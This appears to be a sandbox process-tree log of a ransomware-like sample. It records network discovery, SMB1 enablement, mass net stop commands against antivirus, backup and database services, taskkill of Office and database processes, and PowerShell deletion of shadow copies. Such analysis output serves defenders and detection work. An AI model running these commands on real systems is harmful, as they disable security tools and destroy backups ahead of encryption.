C:\Windows\SysWOW64\net.exe
net view
3⤵
- Discovers systems in the same network
PID:2164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:3388

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
2⤵
PID:924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
3⤵
PID:3396

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
2⤵
PID:2264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
3⤵
PID:3572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:2492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:3636

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
2⤵
PID:2844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
3⤵
PID:3620

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:2052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:3668

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
2⤵
PID:440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
3⤵
PID:3652

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
2⤵
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
3⤵
PID:1896

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
3⤵
PID:3416

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
2⤵
PID:1964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
3⤵
PID:1784

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
2⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
3⤵
PID:3688

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
2⤵
PID:2720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
3⤵
PID:3676

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
2⤵
PID:2420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
3⤵
PID:3660

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
2⤵
PID:820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
3⤵
PID:3644

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
2⤵
PID:2804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
3⤵
PID:2244

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
2⤵
PID:2560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
3⤵
PID:3392

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
3⤵
PID:3460

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
2⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
3⤵
PID:6116

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
2⤵
PID:2232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
3⤵
PID:3344

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
2⤵
PID:1984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
3⤵
PID:3332

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
2⤵
PID:2396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
3⤵
PID:1768

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:2144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:2484

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
2⤵
PID:1388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
3⤵
PID:1620

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:1540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:3548

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
2⤵
PID:2868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
3⤵
PID:1520

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:2656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
3⤵
PID:5776

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
2⤵
PID:2940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
3⤵
PID:3316

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
2⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
3⤵
PID:2068

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
2⤵
PID:2696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
3⤵
PID:3420

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:2364

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:2692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
3⤵
PID:4868

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
2⤵
PID:2808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
3⤵
PID:2348

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
2⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
3⤵
PID:5992

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:2772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:2468

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:2252

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:2456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:4788

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
2⤵
PID:1760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
3⤵
PID:6036

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
2⤵
PID:2752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
3⤵
PID:2300

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
2⤵
PID:2136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
3⤵
PID:3592

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:2928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:3584

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
2⤵
PID:936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:5384

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:2540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
3⤵
PID:3628

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:2784

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
2⤵
PID:2636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
3⤵
PID:4940

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
2⤵
PID:2828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
3⤵
PID:2952

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
2⤵
PID:3060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
3⤵
PID:3624

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
2⤵
PID:2580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
3⤵
PID:3632

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
2⤵
PID:2988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
3⤵
PID:2388

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:1996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3⤵
PID:1492

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
2⤵
PID:3016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
3⤵
PID:2176

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
2⤵
PID:544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:2512

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:2916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:3304

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:1512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3⤵
PID:320

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
2⤵
PID:1172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
3⤵
PID:2536

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
2⤵
PID:2076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
3⤵
PID:2992

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
2⤵
PID:1372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
3⤵
PID:2084

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
2⤵
PID:2876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
3⤵
PID:2844

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:2400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:4896

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
2⤵
PID:3024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
3⤵
PID:5584

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
2⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
3⤵
PID:5832

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
2⤵
PID:1892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
3⤵
PID:2264

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:2272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:3588

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:2584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
3⤵
PID:348

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:2336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:2528

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:1592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
3⤵
PID:820

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:1660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
3⤵
PID:2408

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
2⤵
PID:2412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
3⤵
PID:2428

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:2332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
3⤵
PID:2280

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
2⤵
PID:1188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
3⤵
PID:3648

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:2628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
3⤵
PID:3644

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:3056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
3⤵
PID:5048

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
2⤵
PID:3020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
3⤵
PID:2588

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
2⤵
PID:2724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
3⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
2⤵
PID:1124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
3⤵
PID:3572

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:2196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
3⤵
PID:2812

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
2⤵
PID:2900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:3348

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
2⤵
PID:2956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
3⤵
PID:2668

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
2⤵
PID:2688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
3⤵
PID:3336

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
2⤵
PID:2552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
3⤵
PID:2776

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:2800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
3⤵
PID:3396

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:2676

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
2⤵
PID:2248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
3⤵
PID:5108

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
2⤵
PID:2452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
3⤵
PID:3048

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
2⤵
PID:2260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
3⤵
PID:2728

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
2⤵
PID:2092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
3⤵
PID:3412

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:2280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3⤵
PID:3564

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
2⤵
PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
3⤵
PID:4724

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
2⤵
PID:2668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
3⤵
PID:3588

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:2440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:3036

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
2⤵
PID:2296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
3⤵
PID:3628

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
2⤵
PID:1064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
3⤵
PID:3524

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
2⤵
PID:2756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
3⤵
PID:3540

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:1624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:440

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:2180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:3564

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:2192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:3168

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
2⤵
PID:2224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
3⤵
PID:1796

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:2920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:3652

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3080

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3088

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3148

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:3196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3228

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3236

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3476

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580

